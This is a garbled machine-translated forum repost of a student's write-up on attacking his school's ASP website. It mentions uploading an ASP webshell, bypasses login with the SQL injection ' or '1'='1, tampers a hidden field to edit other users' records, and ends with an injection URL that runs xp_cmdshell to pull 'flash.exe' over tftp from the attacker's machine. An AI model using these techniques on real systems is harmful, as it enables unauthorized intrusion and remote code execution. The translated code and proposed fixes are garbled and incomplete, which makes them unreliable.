2. Tech
  3. Test the security of our school server

Test the security of our school server

xiaoxiao2021-03-06  76

Author: angel article in Nature: Original release date: 2004-04-02 preface my students since the school maintain the site, there is no small privilege, I just upload a "Haiyang ASP Trojan top net" can be freely modified Any web page is, because all sites in schools are placed in http://www.nothing.com/, but I don't dare to do this, and I will not do this. Recently, I learned ASP is quite addictive, and I will see what hidden dangers do in my own ASP program. Problem One In addition to a small amount of ASP files in front desk, the user registration (is the school's talent can register), login, forget the password, personal information to modify these ASP files, first look at forgot password, lostpass.asp is a submission page. Without any ASP statement, look at

The target file is lostpass1.asp, then view the original code, no problem (is my level limited), then look at the next lostpass2.asp, huh, I found a problem Statement:

SQL = "SELECT PWD, Answer from [MEMBER] where userid = '" & userid & "' and answer = '" & answer & "'" such a low-level error will also make, at this time, you only need to construct a special username and password according to SQL , Such as: 'or' 1 '=' 1, the program will turn this:

SQL = "SELECT PWD, Answer from [MEMBER] where userid =" & 'or'1' = 1 & "and pass =" & answer "or is a logical operator, when two conditions are judged, as long as one of them is established, Then, the equation will be established, and in the language, it is true (established) in 1, then in this line of statement, "and" verification of the original statement will no longer continue, because "1 = 1" and "OR" 语 为 为. In this way, we can submit 'or' 1 '=' 1 from the beginning. No matter what we are in what text box, we will submit 'or' 1 '=' 1 This can go to the next page smoothly. In this case, we use 'or' 1 '=' 1 to log in as a username and password. What will it be? The experiment proves that the landing is successful, because the link to display personal data is changed, there is Normally display personal information, I found that the real name is not changed, indicating that there is a certain ID to identify the user, so directly view the web source code to find this important thing: It turned out to rely on this hiddenfield to distinguish the user, then if I have modified the value of Value, can I modify other users? Take my previous registration, replace my number 2001010xxx, Then modify the relative connection in , save as an HTM file, then submit the information I need to modify. Let's take a look at my information, I have been revised, so if I know any user's Hiddenfield, You can modify its information, it is still not chaotic? This is put on one side ... This problem can write a function to prohibit it from external submission data to be resolved. However, this vulnerability is a bit limited, if you want to change a user, you must know Hiddenfield. Value, otherwise it can only be changed. However, since this file is like this, I think the entries verification program should be the same. I tried to log in, success, all members' information matters, and add and modify the administrator, do What can be. This problem is actually very simple. It is possible to handle input characters. It turns out that I thought I used the replace () function, please teach the wind, I know that the MID () function can be solved well. Add a judgment.

US = MID (INPUT, I, 1) IF US = "" OR US = "" or US = "%" or US = "<" 000 = ">" = "&" ten responsponse.redirect " ERROR_PAGE.ASP "Response.end) You can check the characters entered by the user, of course, you should try more to check some special characters. This line of code means checking the input characters, if there are spaces, single quotes, percentages, and <","> "to redirect to ERROR_PAGE.ASP this page. Although "Haiyang Top Network ASP Troja" has the ability of the school server, we still have to start from the school's procedure, otherwise it is meaningless, "Haiyang Top Network ASP Trojan" is only acting as a viewing code. Character. Question II usually some data call files will have some SQL INJECTION vulnerabilities, such as Show.asp, ShowAnasp, Shownews.asp, Showuser.asp, etc., because these files are easy to ignore check variables, I see a shownews.asp file . Open immediately, the original code is as follows (because this file is too large, limited to the space, I removed a lot of html code):

<% OPTION Explicit%> <% DIM SQL, RS, RSC, THEDATE DIM REVIEWABLE, ABOUTNEWS SET RS = Server.createObject ("AdoDb.Recordset") ' Find the number of related news and whether to open comment rights rs.open "Select * from news_parameter where parameterid = 1", conn, 1 ,1 if not rs.bof and not rs.eof damoutnews = rs ("Aboutnews") IF = RS ( "reviewable") = 1 then reviewable = 1 else reviewable = 0 end if else aboutnews = 5 reviewable = 1 end if rs.close set rs = nothing set rs = server.createobject ( "adodb.recordset") sql = "update News set hits = hits where newsid = "& cstr (" newsid "))) Conn.execute SQL IF session (" purview ") =" "Then Rs.Open" Select * from news where newsid = "& cstr (Request ("NEWSID")) & "And Audit = 1", CONN, 1, 1 Else Rs.open "Select * from news where newsid =" & cstr (Request ("newsid"), conn, 1, 1 end if If Err.Number <> 0 Then Response.write "Database Error" Else if rs.bof and rs.eof the rs.close response.write "This news does not exist or have not reviewed" else%> <% = rs ("Topic")%> </ Title> <meta http-equiv = "content-type" content = "text / html; charset = GB2312"> </ head> <body bgcolor = "# ffffff" text = "# 000000" TopMargin = 0 Leftmargin = 0 Right Margin = 0> <table width = "92%" border = "0" cellspacing = "0" cellpadding = "0" align = "center"> <tr> <TD height = "36"</p> <p>Valign = "middle"> <div align = "center"> <br> <font size = 3> <b> <% = RS ("Topic")%> </ b> </ font> <HR size = 0 Width = 100%> </ div> <tr> <td> <div align = "center"> <% = rs ("ntime")%> <% if Trim (RS (" NFROM ")) <>" "" "" "" & TRIM ("NFROM")) End IF%> <% IF TRIM (RS ("Writer") <> "". ". write "author:" & trim (rs ( "writer")) end if%> Views: <% = rs ( "hits")%> <hr size = 0 width = 100%> </ div> </ td > </ tr> <tr> <td valign = "TOP"> <% DIM Content Content = RS ("Content") content = replace (content, "../../../", "../ news / ") response.write content%> </ td> </ tr> <tr> <td valign =" top "> <br> <br> <br> <b> --------- - Related News ---------- </ b> <br> <% SET RSC = Server.createObject ("AdoDb.Recordset") IF session ("purview") = "" "" "" SELECT TOP "& Aboutnews &" * from news where keys like '% "& TRIM (RS (" Keys ") &"%' and newsid <> "& cstr (RS (" newsid ") &" and audit = 1 Order by NTIME DESC ", CONN, 1, 1 ELSE RSC.Open" SELECT TOP "& Aboutnews &" * from news where keys like '% "& TRIM (RS (" Keys ") &"%' and newsid < > "& CSTR ("newsid") & "Order by ntime desc"</p> <p>, CONN, 1, 1 End if if rsc.bof and rsc.eof kilite.write, "else response.write" <ul type = circle> "do while not rsc.eof response.write <li > "THEDATE =" ("" ("NTIME"))) & "-" & cstr (Month ("NTIME"))) & "-" & cstr (day (RSC ("NTIME "))) &") "Response.write" <a href='shownews.asp?newsid=" & cstr(RSC ("Newsid ") & Trim (RSC (" Topic " )) & "<font color = '# 6365ce' size = '1'>" & theirdate & "</ font>"))) = month ("NTIME"))) = Month (now ()) and clng (TRIM ("NTIME"))))))) 1)> = clng (DAY ())) ")")) ").. GIF> <br> "end if rsc.movenext loop end if rsc.close set RSC = Nothing%> </ ul> </ td> </ tr> </ table> <! - # include file =" Function / Copyright.inc "-> </ body> </ html> <% end if End if%> <! - # include file =" function / dbclose.asp "-> Have you seen it? The file did not check any variables at all, so this file is how to use it, huh, huh, see this sentence, rsopen "select * from news where newsid =" & cstr (Request ("newsid"), conn 1, 1 Since the program does not have any variables at all. We can directly construct a NewsID to launch SQL INJECTION attacks. We can submit such a code to perform system commands with the permissions owned by users who connect this SQL database.</p> <p>http://ourschool/shownews.asp? newsid = 1; exec master.dbo.xp_cmdshell 'tftp -i myip get flash.exe'; - a solution to this file is to filter with the Replace function, see the following code :</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-93236.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="93236" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.036</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'sQUoyO_2B8biYHIM8tZZiVd35tWLq1uBO_2FdK5D_2F7nnZtXOvRL3hsQvkqOaHXLHYLYz8HILnyPWc9bdEgjoR1Au2w_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>